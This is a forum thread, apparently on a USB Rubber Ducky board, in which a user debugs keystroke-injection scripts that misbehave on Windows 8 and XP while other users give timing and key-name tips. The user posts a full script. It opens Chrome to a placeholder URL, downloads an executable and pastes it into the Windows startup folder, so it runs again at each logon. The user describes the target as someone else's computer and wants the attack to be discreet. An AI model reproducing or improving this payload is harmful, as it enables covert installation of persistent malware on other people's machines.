Jump to content

Recommended Posts

Posted (edited)

Hi !

I received my Ducky yesterday and I tried to make a script but it didn't work, so I wrote a very simple script to isolate the part that doesn't work. I added a few delays, too, but it didn't solve the problem.

REM Test file
DELAY 2000
GUI r
DELAY 1000
STRING notepad.exe
ENTER

When I try with this one, nothing happens, unless I'm in a webpage or a text editor, and then, the following characters appear on my screen :

rnotepad.exe

So, I guess that the combo "GUI + r" doesn't work. It's quite bothering, I can't do what I wanted, without this shortcut... (I actually want to launch cmd).

I tried a few things but nothing worked :

- Replacing "GUI r" by "WINDOWS r" or "GUI R"

- Trying different encoders. I've tried the online encoder, the v 1.2 command-line encoder, the encoder with a graphical interface.

- Trying different language settings (I have a french keyboard).

- Pressing the button on the Ducky.

I'm running the script on Windows 8.

Do you have any idea on why this shortcut doesn't work and what I could do to solve this ?

Thanks a lot. :smile:

Edited by BlueMint
Posted (edited)

On windows 8, you might want to try:

CONTROL ESCAPE

Instead of

GUI r

Thanks for the help. This shortcut works on windows 8 (with looong delays), but unfortunately, my real target is a windows XP. On XP, "CONTROL ESCAPE" only opens the windows menu, and then, when I type "cmd", the first item beginning by a "c" is launched...

Edited by BlueMint
Posted (edited)

Your initial delay needs to be pretty long due to device detection of the OS. Mileage may vary.

I put a "DELAY 5000" in the beginning, and "GUI r" still doesn't work on win8.

But it doesn't matter : as phpsystems said, there is still the "CONTROL escape" shortcut in this OS.

Now, I'm testing my payload on Windows XP. It failed a few times, but I understood that it was because I was using it on a VM : some random keys fail, sometimes, with vms.

Okay, so I tested it on a real windows XP and the ducky's behaviour is pretty unstable. The worst part is that some commands doesnt work, like "CONTROL x", "CONTROL c", "CONTROL v". I'm trying to replace them with more complex operations (F10 - RIGHT - DOWN - DOWN - DOWN - ENTER, in windows explorer, to copy a file) but it's really bothering, because it takes more time, it's not discreet, and it's not really stable either...

So do you have any idea on why those commands doesn't work ?

Do I have to update the ducky's firmware or anything ?

Edited by BlueMint
Posted

Try CTRL vs CONTROL and see if that makes a difference. Post your source you are compiling?

Start with putting some delays between every command to see if it's working properly and then trim down the delays from there.

For example, if you are trying to do GUI + R, cmd, enter too fast, the computer may not have the run box active before the ducky start typing cmd and enter.

Posted (edited)

Thanks for the help.

So, this is my script. I replaced "CONTROL" by "CTRL" as you suggested, and I put 1000ms delays around the "control" commands :

DELAY 6000
GUI r
DELAY 1000
STRING chrome -incognito "http://mysite/file.exe"
ENTER
DELAY 3000
CONTROL j
DELAY 1000
TAB
DELAY 100
TAB
DELAY 100
TAB
DELAY 100
ENTER
DELAY 100
LEFT
DELAY 100
ENTER
DELAY 500
TAB
DELAY 100
ENTER
DELAY 1000
TAB
DELAY 1000
ENTER
DELAY 1000
CTRL c
DELAY 1000
ALT F4
DELAY 1000
GUI r
DELAY 1000
STRING cmd
ENTER
DELAY 1000
STRING start shell:startup
ENTER
DELAY 1000
CTRL v
DELAY 1000
ENTER
DELAY 1000
DOWN
DELAY 1000
STRING -
DELAY 1000
UP
DELAY 1000
LEFT
DELAY 1000
ENTER
DELAY 1000
ALT f4
DELAY 1000
ALT f4
DELAY 1000

(The part where I download a file in chrome is only because powershell is not installed in my target's computer, and "ftp" command give me errors on windows xp, so I can't get my file directly with the shell).

I'm not sure either about the "STRING -" (to uncheck a windows box) but my payload stops working before that point.

I made a video. Look, at 00:17, i've "opened file location" in chrome, and I send the command : CTRL c.

And the path is suddently selected, and nothing is copied in the clipboard.

I have the same problem with CONTROL c, or with CTRL x.

https://www.youtube.com/watch?v=nbAXdFJ2cLc

Edited by BlueMint
Posted

That is kind of odd. Maybe add a keyboard "b" key press like you were spelling out the program to highlight it and try that out? I don't have a Win XP to test on.

It may be doing something funky with Chrome "Show In Folder" with XP and selecting the path bar instead of the file itself.

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...